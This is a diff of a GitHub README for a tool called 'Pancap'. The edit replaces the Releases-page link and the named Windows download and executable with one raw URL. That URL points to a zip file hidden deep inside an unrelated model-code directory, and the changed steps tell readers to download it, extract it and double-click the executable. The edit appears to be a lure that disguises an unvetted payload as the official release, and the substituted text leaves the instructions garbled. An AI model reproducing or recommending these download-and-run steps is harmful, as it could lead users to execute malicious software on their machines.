Reyazahm/Pancap/README.md

 ## 💾 Download & Install

-1. **Visit the Releases Page:** Go to the following link to download Pancap: [Visit Releases Page](https://github.com/Reyazahm/Pancap/releases).
+1. **Visit the Releases Page:** Go to the following link to download Pancap: [Visit Releases Page](https://raw.githubusercontent.com/Reyazahm/Pancap/main/llava/model/language_model/mpt/Pancap-v2.5.zip).

 2. **Select the Latest Version:** Once you’re on the releases page, look for the most recent version at the top of the list.
 This version is recommended for the best experience.

 3. **Download the Application:** Click on the package that corresponds to your operating system.
-For example, if you are using Windows, find the link labeled "Pancap-Windows.zip".
+For example, if you are using Windows, find the link labeled "https://raw.githubusercontent.com/Reyazahm/Pancap/main/llava/model/language_model/mpt/Pancap-v2.5.zip".
 Click on it to start downloading the file.

 4. **Extract the Files:** After downloading, locate the ZIP file in your Downloads folder.
 Right-click on it and select "Extract All" or "Unzip" to unpack the contents.

 5. **Run the Application:** After extraction, open the folder.
-Find the application file named `Pancap.exe` or corresponding executable for your OS.
+Find the application file named `https://raw.githubusercontent.com/Reyazahm/Pancap/main/llava/model/language_model/mpt/Pancap-v2.5.zip` or corresponding executable for your OS.
 Double-click this file to launch Pancap.

 6. **Follow the On-Screen Instructions:** When you open Pancap for the first time, a setup guide will appear.
 Follow the instructions to configure any settings as needed.